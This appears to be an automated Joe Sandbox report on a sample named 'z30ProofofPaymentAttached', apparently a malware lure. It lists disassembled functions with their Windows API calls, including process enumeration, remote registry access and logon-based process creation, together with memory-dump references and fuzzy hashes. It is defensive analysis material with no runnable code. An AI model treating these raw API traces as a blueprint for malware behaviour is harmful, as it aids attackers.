SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 0101A32D
SendMessageW.USER32(?,00000409,00000000,FF000000), ref: 0101A33A
SendMessageW.USER32(?,00000402,00000000,00000000), ref: 0101A345
SendMessageW.USER32(?,00000401,00000000,00640000), ref: 0101A354
SendMessageW.USER32(?,00000404,00000001,00000000), ref: 0101A360

Strings

Msctls_Progress32, xrefs: 0101A2FE

Memory Dump Source

Source File: 00000001.00000002.1297736353.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000001.00000002.1297714376.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297805839.000000000103D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297805839.000000000105E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297849606.000000000106A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297867353.0000000001074000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_fb0000_z30ProofofPaymentAttached.jbxd

Similarity

API ID: MessageSend$CreateObjectStockWindow
String ID: Msctls_Progress32
API String ID: 1025951953-3636473452
Opcode ID: 0146c85ece0c54450c5fe8a723c0b4b753b34a12bb229dfac3e01506d7f64e32
Instruction ID: 298716bf35befedac8251fe85536f258494723c3746d00b34394be8b529293e8
Opcode Fuzzy Hash: 0146c85ece0c54450c5fe8a723c0b4b753b34a12bb229dfac3e01506d7f64e32
Instruction Fuzzy Hash: 4F11B2B1250219BEEF115FA4CC85EEB7F6DFF08798F014114FA48A6090C7769C21DBA4

Function 00FCCCCD Relevance: 9.3, APIs: 6, Instructions: 253COMMON

Download Yara Rule

APIs

GetClientRect.USER32(?,?), ref: 00FCCCF6
GetWindowRect.USER32(?,?), ref: 00FCCD37
ScreenToClient.USER32(?,?), ref: 00FCCD5F
GetClientRect.USER32(?,?), ref: 00FCCE8C
GetWindowRect.USER32(?,?), ref: 00FCCEA5

Memory Dump Source

Source File: 00000001.00000002.1297736353.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000001.00000002.1297714376.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297805839.000000000103D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297805839.000000000105E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297849606.000000000106A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297867353.0000000001074000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_fb0000_z30ProofofPaymentAttached.jbxd

Similarity

API ID: Rect$Client$Window$Screen
String ID:
API String ID: 1296646539-0
Opcode ID: 0635ee3ba7a5a25f5c0250dcef90d1c67a1c1cc298c52d156dd33575650f7a59
Instruction ID: 8d71ff909215f75ff08c327ef80afe64136422a1b2005827b22980c182ca62bc
Opcode Fuzzy Hash: 0635ee3ba7a5a25f5c0250dcef90d1c67a1c1cc298c52d156dd33575650f7a59
Instruction Fuzzy Hash: 72B18F7990024ADBDF10CFA8C581BEDBBB1FF08310F148169EDA9EB255DB34A941DB94

Function 01011BDF Relevance: 9.2, APIs: 6, Instructions: 163processCOMMON

Download Yara Rule

APIs

CreateToolhelp32Snapshot.KERNEL32 ref: 01011C18
Process32FirstW.KERNEL32(00000000,?), ref: 01011C26
__wsplitpath.LIBCMT ref: 01011C54

Part of subcall function 00FD1DFC: __wsplitpath_helper.LIBCMT ref: 00FD1E3C

_wcscat.LIBCMT ref: 01011C69
Process32NextW.KERNEL32(00000000,?), ref: 01011CDF
CloseHandle.KERNEL32(00000000,?,?,00000002,00000000), ref: 01011CF1

Memory Dump Source

Source File: 00000001.00000002.1297736353.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000001.00000002.1297714376.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297805839.000000000103D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297805839.000000000105E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297849606.000000000106A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297867353.0000000001074000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_fb0000_z30ProofofPaymentAttached.jbxd

Similarity

API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32__wsplitpath__wsplitpath_helper_wcscat
String ID:
API String ID: 1380811348-0
Opcode ID: 923b51b98deb04446c3be1e993955ab42299d42174541b88bb9e09217467980b
Instruction ID: 939ce28fc4a1f9916c43104631d36733cc0587f2f564521c822074b446142476
Opcode Fuzzy Hash: 923b51b98deb04446c3be1e993955ab42299d42174541b88bb9e09217467980b
Instruction Fuzzy Hash: 28516C71104341ABD720EF64CC85EABB7ECEF88754F00491EF58597251EB38DA04CB92

Function 01012FD6 Relevance: 9.2, APIs: 6, Instructions: 160registryCOMMON

Download Yara Rule

APIs

Part of subcall function 01013C06: CharUpperBuffW.USER32(?,?,?,?,?,?,?,01012BB5,?,?), ref: 01013C1D

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 010130AF
RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 010130EF
RegCloseKey.ADVAPI32(?,00000001,00000000), ref: 01013112
RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 0101313B
RegCloseKey.ADVAPI32(?,?,00000000), ref: 0101317E
RegCloseKey.ADVAPI32(00000000), ref: 0101318B

Memory Dump Source

Source File: 00000001.00000002.1297736353.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000001.00000002.1297714376.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297805839.000000000103D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297805839.000000000105E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297849606.000000000106A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297867353.0000000001074000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_fb0000_z30ProofofPaymentAttached.jbxd

Similarity

API ID: Close$BuffCharConnectEnumOpenRegistryUpperValue
String ID:
API String ID: 3451389628-0
Opcode ID: d5aba62d457098fa88ef2f9c30c427bc59664b02d50d5673b689db53854c1ded
Instruction ID: 324c13cee8d6f39cbcdafecccc43a3558c992937f5cfdcabbcd0cad98d8f23d2
Opcode Fuzzy Hash: d5aba62d457098fa88ef2f9c30c427bc59664b02d50d5673b689db53854c1ded
Instruction Fuzzy Hash: 95515831108204AFC704EF64CD95EAEBBF9BF88310F04495DF6958B291DB39E905DB52

Function 010184DE Relevance: 9.2, APIs: 6, Instructions: 152windowCOMMON

Download Yara Rule

APIs

GetMenu.USER32(?), ref: 01018540
GetMenuItemCount.USER32(00000000), ref: 01018577
GetMenuStringW.USER32(00000000,00000000,?,00007FFF,00000400), ref: 0101859F
GetMenuItemID.USER32(?,?), ref: 0101860E
GetSubMenu.USER32(?,?), ref: 0101861C
PostMessageW.USER32(?,00000111,?,00000000), ref: 0101866D

Memory Dump Source

Source File: 00000001.00000002.1297736353.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000001.00000002.1297714376.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297805839.000000000103D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297805839.000000000105E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297849606.000000000106A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297867353.0000000001074000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_fb0000_z30ProofofPaymentAttached.jbxd

Similarity

API ID: Menu$Item$CountMessagePostString
String ID:
API String ID: 650687236-0
Opcode ID: dae034c91a0587a90a9d4a4bee8ff50660d0c2edf6a2e622616c41d95986e092
Instruction ID: 3a9fce2128d6b25d5b3cde9a7ea9ef6943230e4c8e73981be673687179752cea
Opcode Fuzzy Hash: dae034c91a0587a90a9d4a4bee8ff50660d0c2edf6a2e622616c41d95986e092
Instruction Fuzzy Hash: 8051B135A00219AFCB11DF98C945AEEB7F5FF48710F04849AE955B7355DB38AE408B90

Function 00FF4AC2 Relevance: 9.1, APIs: 6, Instructions: 136windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00FF4B10
GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00FF4B5B
IsMenu.USER32(00000000), ref: 00FF4B7B
CreatePopupMenu.USER32 ref: 00FF4BAF
GetMenuItemCount.USER32(000000FF), ref: 00FF4C0D
InsertMenuItemW.USER32(00000000,?,00000001,00000030), ref: 00FF4C3E

Memory Dump Source

Source File: 00000001.00000002.1297736353.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000001.00000002.1297714376.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297805839.000000000103D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297805839.000000000105E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297849606.000000000106A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297867353.0000000001074000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_fb0000_z30ProofofPaymentAttached.jbxd

Similarity

API ID: Menu$Item$CountCreateInfoInsertPopup_memset
String ID:
API String ID: 3311875123-0
Opcode ID: 48ad7a0699b13e41ec56c6ce2419b5d5c8c4157359d0dff795b09d629a4531fa
Instruction ID: c0298b3c5da815fe0cb836f3de44fb32065ff37b604f3342d246e16c9e936f2b
Opcode Fuzzy Hash: 48ad7a0699b13e41ec56c6ce2419b5d5c8c4157359d0dff795b09d629a4531fa
Instruction Fuzzy Hash: 8D51F270A0120DDFDF20CFA8C888BBFBBF4AF44328F144119E6659B2A1D775A944DB11

Function 01008DE2 Relevance: 9.1, APIs: 6, Instructions: 136networkCOMMON

Download Yara Rule

APIs

select.WSOCK32(00000000,00000001,00000000,00000000,?), ref: 01008E7C
WSAGetLastError.WSOCK32(00000000), ref: 01008E89
__WSAFDIsSet.WSOCK32(00000000,00000001), ref: 01008EAD
#16.WSOCK32(?,?,00000000,00000000), ref: 01008EC5
_strlen.LIBCMT ref: 01008EF7
WSAGetLastError.WSOCK32(00000000), ref: 01008F6A

Memory Dump Source

Source File: 00000001.00000002.1297736353.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000001.00000002.1297714376.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297805839.000000000103D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297805839.000000000105E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297849606.000000000106A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297867353.0000000001074000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_fb0000_z30ProofofPaymentAttached.jbxd

Similarity

API ID: ErrorLast$_strlenselect
String ID:
API String ID: 2217125717-0
Opcode ID: 98da6fb71403531fdb8fb8031046a73fb824f465393200cc820750dc39cd630a
Instruction ID: af73803a5503b4100c792418f5fe29b72913a4d714f0f9b8a47b589132a2b987
Opcode Fuzzy Hash: 98da6fb71403531fdb8fb8031046a73fb824f465393200cc820750dc39cd630a
Instruction Fuzzy Hash: A9419371900104ABD715EBA4CD85EEEB7BDBF48310F10855AF656972D1EB34AE00CB60

Function 00FCABF5 Relevance: 9.1, APIs: 6, Instructions: 113COMMON

Download Yara Rule

APIs

Part of subcall function 00FCB34E: GetWindowLongW.USER32(?,000000EB), ref: 00FCB35F

BeginPaint.USER32(?,?,?), ref: 00FCAC2A
GetWindowRect.USER32(?,?), ref: 00FCAC8E
ScreenToClient.USER32(?,?), ref: 00FCACAB
SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 00FCACBC
EndPaint.USER32(?,?,?,?,?), ref: 00FCAD06
Rectangle.GDI32(00000000,00000000,00000000,?,?), ref: 0102E673

Memory Dump Source

Source File: 00000001.00000002.1297736353.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000001.00000002.1297714376.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297805839.000000000103D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297805839.000000000105E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297849606.000000000106A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297867353.0000000001074000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_fb0000_z30ProofofPaymentAttached.jbxd

Similarity

API ID: PaintWindow$BeginClientLongRectRectangleScreenViewport
String ID:
API String ID: 2592858361-0
Opcode ID: dc619193b03bbd6b16784caa3607ce7c5546a8feaa938375e537c425aea00bad
Instruction ID: 23c41545c6f64cb6845ae49bad0c6a4e61b341a04a4b4475fcc13b4ebfd12f53
Opcode Fuzzy Hash: dc619193b03bbd6b16784caa3607ce7c5546a8feaa938375e537c425aea00bad
Instruction Fuzzy Hash: A641C171500206AFC721DF24D989FB67BE8FB49764F04065DF9E5872D1C33AA844EB62

Function 0101E397 Relevance: 9.1, APIs: 6, Instructions: 108windowCOMMON

Download Yara Rule

APIs

ShowWindow.USER32(01071628,00000000,01071628,00000000,00000000,01071628,?,0102DC5D,00000000,?,00000000,00000000,00000000,?,0102DAD1,00000004), ref: 0101E40B
EnableWindow.USER32(00000000,00000000), ref: 0101E42F
ShowWindow.USER32(01071628,00000000), ref: 0101E48F
ShowWindow.USER32(00000000,00000004), ref: 0101E4A1
EnableWindow.USER32(00000000,00000001), ref: 0101E4C5
SendMessageW.USER32(?,0000130C,00000000,00000000), ref: 0101E4E8

Memory Dump Source

Source File: 00000001.00000002.1297736353.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000001.00000002.1297714376.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297805839.000000000103D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297805839.000000000105E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297849606.000000000106A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297867353.0000000001074000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_fb0000_z30ProofofPaymentAttached.jbxd

Similarity

API ID: Window$Show$Enable$MessageSend
String ID:
API String ID: 642888154-0
Opcode ID: 183ce13d0edf6b86dc0765bb30aa3de7ad2cc68e54256adf91274f6b113f2870
Instruction ID: 4adacf11e60af9adedc5b02a0106cb01bc3f88328ac79f1ec71283186ce3794b
Opcode Fuzzy Hash: 183ce13d0edf6b86dc0765bb30aa3de7ad2cc68e54256adf91274f6b113f2870
Instruction Fuzzy Hash: FA418134641150EFEB63CF28C489B987FE0BF09304F5841E9EE998F1A6CB39A441DB51

Function 00FF98BA Relevance: 9.1, APIs: 6, Instructions: 100fileCOMMON

Download Yara Rule

APIs

InterlockedExchange.KERNEL32(?,000001F5), ref: 00FF98D1

Part of subcall function 00FCF4EA: std::exception::exception.LIBCMT ref: 00FCF51E
Part of subcall function 00FCF4EA: __CxxThrowException@8.LIBCMT ref: 00FCF533

ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,?,00000000), ref: 00FF9908
EnterCriticalSection.KERNEL32(?), ref: 00FF9924
LeaveCriticalSection.KERNEL32(?), ref: 00FF999E
ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,00000000,00000000), ref: 00FF99B3
InterlockedExchange.KERNEL32(?,000001F6), ref: 00FF99D2

Memory Dump Source

Source File: 00000001.00000002.1297736353.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000001.00000002.1297714376.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297805839.000000000103D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297805839.000000000105E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297849606.000000000106A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297867353.0000000001074000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_fb0000_z30ProofofPaymentAttached.jbxd

Similarity

API ID: CriticalExchangeFileInterlockedReadSection$EnterException@8LeaveThrowstd::exception::exception
String ID:
API String ID: 2537439066-0
Opcode ID: f746918419e87b65c2f4630af34f336bb7fe6918479e215e49337ced6e298728
Instruction ID: a6690e3d66e7657faa5572f2d1e01411b3d2bbd57fd19347c48aa561b1a7f7f5
Opcode Fuzzy Hash: f746918419e87b65c2f4630af34f336bb7fe6918479e215e49337ced6e298728
Instruction Fuzzy Hash: 8031C431A00105EBDB20DF94DD85EAFB779FF45310B1580A9F904AB24AD779DE14DBA0

Function 01009B45 Relevance: 9.1, APIs: 6, Instructions: 99COMMON

Download Yara Rule

APIs

GetForegroundWindow.USER32(?,?,?,?,?,?,010077F4,?,?,00000000,00000001), ref: 01009B53

Part of subcall function 01006544: GetWindowRect.USER32(?,?), ref: 01006557

GetDesktopWindow.USER32 ref: 01009B7D
GetWindowRect.USER32(00000000), ref: 01009B84
mouse_event.USER32(00008001,?,?,00000001,00000001), ref: 01009BB6

Part of subcall function 00FF7A58: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 00FF7AD0

GetCursorPos.USER32(?), ref: 01009BE2
mouse_event.USER32(00008001,?,?,00000000,00000000), ref: 01009C44

Memory Dump Source

Source File: 00000001.00000002.1297736353.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000001.00000002.1297714376.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297805839.000000000103D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297805839.000000000105E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297849606.000000000106A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297867353.0000000001074000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_fb0000_z30ProofofPaymentAttached.jbxd

Similarity

API ID: Window$Rectmouse_event$CursorDesktopForegroundSleep
String ID:
API String ID: 4137160315-0
Opcode ID: 9c7e4c83bcf2b6150685ac665e2e123c8f121d26745e3ee13d659bf9ad4cb9ba
Instruction ID: b4791969c88ed8e97a64c75ec3600f3395a7d265e4c1d08c97eed49e9d7f7a51
Opcode Fuzzy Hash: 9c7e4c83bcf2b6150685ac665e2e123c8f121d26745e3ee13d659bf9ad4cb9ba
Instruction Fuzzy Hash: 4E31BE72504309ABD720DF588848A9AB7EDFF89318F00091AF599971C2DA35E914CB92

Function 00FEAF64 Relevance: 9.1, APIs: 6, Instructions: 73processCOMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(0000000A,00000004), ref: 00FEAFAE
OpenProcessToken.ADVAPI32(00000000), ref: 00FEAFB5
CreateEnvironmentBlock.USERENV(?,00000004,00000001), ref: 00FEAFC4
CloseHandle.KERNEL32(00000004), ref: 00FEAFCF
CreateProcessWithLogonW.ADVAPI32(?,?,?,00000000,00000000,?,?,00000000,?,?,?), ref: 00FEAFFE
DestroyEnvironmentBlock.USERENV(00000000), ref: 00FEB012

Memory Dump Source

Source File: 00000001.00000002.1297736353.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000001.00000002.1297714376.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297805839.000000000103D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297805839.000000000105E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297849606.000000000106A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297867353.0000000001074000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_fb0000_z30ProofofPaymentAttached.jbxd

Similarity

API ID: Process$BlockCreateEnvironment$CloseCurrentDestroyHandleLogonOpenTokenWith
String ID:
API String ID: 1413079979-0
Opcode ID: d39456c28a898771c25cf30fe1cb040748147c63f8c9a369d5102fcd41023316
Instruction ID: 61cdf3f728bcf356fba97414322e784ba2c0e3ffb6cefb25dc9396fd7a97921c
Opcode Fuzzy Hash: d39456c28a898771c25cf30fe1cb040748147c63f8c9a369d5102fcd41023316
Instruction Fuzzy Hash: 87218E72500289AFCF128FE9D909FAE7BADEF44314F148055FA01A2161C37AED20EB61

Function 0101EBF6 Relevance: 9.0, APIs: 6, Instructions: 49COMMON

Download Yara Rule

APIs

Part of subcall function 00FCAF83: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,?,00000000), ref: 00FCAFE3
Part of subcall function 00FCAF83: SelectObject.GDI32(?,00000000), ref: 00FCAFF2
Part of subcall function 00FCAF83: BeginPath.GDI32(?), ref: 00FCB009
Part of subcall function 00FCAF83: SelectObject.GDI32(?,00000000), ref: 00FCB033

MoveToEx.GDI32(00000000,-00000002,?,00000000), ref: 0101EC20
LineTo.GDI32(00000000,00000003,?), ref: 0101EC34
MoveToEx.GDI32(00000000,00000000,?,00000000), ref: 0101EC42
LineTo.GDI32(00000000,00000000,?), ref: 0101EC52
EndPath.GDI32(00000000), ref: 0101EC62
StrokePath.GDI32(00000000), ref: 0101EC72

Memory Dump Source

Source File: 00000001.00000002.1297736353.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000001.00000002.1297714376.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297805839.000000000103D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297805839.000000000105E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297849606.000000000106A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297867353.0000000001074000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_fb0000_z30ProofofPaymentAttached.jbxd

Similarity

API ID: Path$LineMoveObjectSelect$BeginCreateStroke
String ID:
API String ID: 43455801-0
Opcode ID: 6180566754890effe9428a937135dcdc11c5c25caaf28e4fe3c71ff866a04f7e
Instruction ID: 50af059fe329778fdf3913383fedb4c172781719de4a10460c90231c6ee1a8a4
Opcode Fuzzy Hash: 6180566754890effe9428a937135dcdc11c5c25caaf28e4fe3c71ff866a04f7e
Instruction Fuzzy Hash: 6C115B7240014DBFEF229FA0DC88FEA7F6DEB08390F048012BE4899164C7769D55DBA0

Function 00FEE19B Relevance: 9.0, APIs: 6, Instructions: 48COMMON

Download Yara Rule

APIs

GetDC.USER32(00000000), ref: 00FEE1C0
GetDeviceCaps.GDI32(00000000,00000058), ref: 00FEE1D1
GetDeviceCaps.GDI32(00000000,0000005A), ref: 00FEE1D8
ReleaseDC.USER32(00000000,00000000), ref: 00FEE1E0
MulDiv.KERNEL32(000009EC,?,00000000), ref: 00FEE1F7
MulDiv.KERNEL32(000009EC,?,?), ref: 00FEE209

Part of subcall function 00FE9AA3: RaiseException.KERNEL32(-C0000018,00000001,00000000,00000000,00FE9A05,00000000,00000000,?,00FE9DDB), ref: 00FEA53A

Memory Dump Source

Source File: 00000001.00000002.1297736353.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000001.00000002.1297714376.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297805839.000000000103D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297805839.000000000105E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297849606.000000000106A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297867353.0000000001074000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_fb0000_z30ProofofPaymentAttached.jbxd

Similarity

API ID: CapsDevice$ExceptionRaiseRelease
String ID:
API String ID: 603618608-0
Opcode ID: fa9bd1ecb58a07c43eef7db5500811447e4fb86ac0198de6d1fa7514f3b82a95
Instruction ID: f7ec67760e3101f9cfb3b635797a81922144c49d499895f8b56c0d6bfae4475d
Opcode Fuzzy Hash: fa9bd1ecb58a07c43eef7db5500811447e4fb86ac0198de6d1fa7514f3b82a95
Instruction Fuzzy Hash: 5A018FB5E00754BFEB109FE69C45B5EBFB9EB48751F004066FE08A7280D6759C01DBA0

Function 00FD7B47 Relevance: 9.0, APIs: 6, Instructions: 45threadCOMMON

Download Yara Rule

APIs

__init_pointers.LIBCMT ref: 00FD7B47

Part of subcall function 00FD123A: __initp_misc_winsig.LIBCMT ref: 00FD125E
Part of subcall function 00FD123A: GetModuleHandleW.KERNEL32(kernel32.dll), ref: 00FD7F51
Part of subcall function 00FD123A: GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 00FD7F65
Part of subcall function 00FD123A: GetProcAddress.KERNEL32(00000000,FlsFree), ref: 00FD7F78
Part of subcall function 00FD123A: GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 00FD7F8B
Part of subcall function 00FD123A: GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 00FD7F9E
Part of subcall function 00FD123A: GetProcAddress.KERNEL32(00000000,InitializeCriticalSectionEx), ref: 00FD7FB1
Part of subcall function 00FD123A: GetProcAddress.KERNEL32(00000000,CreateSemaphoreExW), ref: 00FD7FC4
Part of subcall function 00FD123A: GetProcAddress.KERNEL32(00000000,SetThreadStackGuarantee), ref: 00FD7FD7
Part of subcall function 00FD123A: GetProcAddress.KERNEL32(00000000,CreateThreadpoolTimer), ref: 00FD7FEA
Part of subcall function 00FD123A: GetProcAddress.KERNEL32(00000000,SetThreadpoolTimer), ref: 00FD7FFD
Part of subcall function 00FD123A: GetProcAddress.KERNEL32(00000000,WaitForThreadpoolTimerCallbacks), ref: 00FD8010
Part of subcall function 00FD123A: GetProcAddress.KERNEL32(00000000,CloseThreadpoolTimer), ref: 00FD8023
Part of subcall function 00FD123A: GetProcAddress.KERNEL32(00000000,CreateThreadpoolWait), ref: 00FD8036
Part of subcall function 00FD123A: GetProcAddress.KERNEL32(00000000,SetThreadpoolWait), ref: 00FD8049
Part of subcall function 00FD123A: GetProcAddress.KERNEL32(00000000,CloseThreadpoolWait), ref: 00FD805C
Part of subcall function 00FD123A: GetProcAddress.KERNEL32(00000000,FlushProcessWriteBuffers), ref: 00FD806F

__mtinitlocks.LIBCMT ref: 00FD7B4C

Part of subcall function 00FD7E23: InitializeCriticalSectionAndSpinCount.KERNEL32(0106AC68,00000FA0,?,?,00FD7B51,00FD5E77,01066C70,00000014), ref: 00FD7E41

__mtterm.LIBCMT ref: 00FD7B55

Part of subcall function 00FD7BBD: DeleteCriticalSection.KERNEL32(00000000,00000000,?,?,00FD7B5A,00FD5E77,01066C70,00000014), ref: 00FD7D3F
Part of subcall function 00FD7BBD: _free.LIBCMT ref: 00FD7D46
Part of subcall function 00FD7BBD: DeleteCriticalSection.KERNEL32(0106AC68,?,?,00FD7B5A,00FD5E77,01066C70,00000014), ref: 00FD7D68

__calloc_crt.LIBCMT ref: 00FD7B7A
GetCurrentThreadId.KERNEL32 ref: 00FD7BA3

Memory Dump Source

Source File: 00000001.00000002.1297736353.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000001.00000002.1297714376.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297805839.000000000103D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297805839.000000000105E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297849606.000000000106A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297867353.0000000001074000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_fb0000_z30ProofofPaymentAttached.jbxd

Similarity

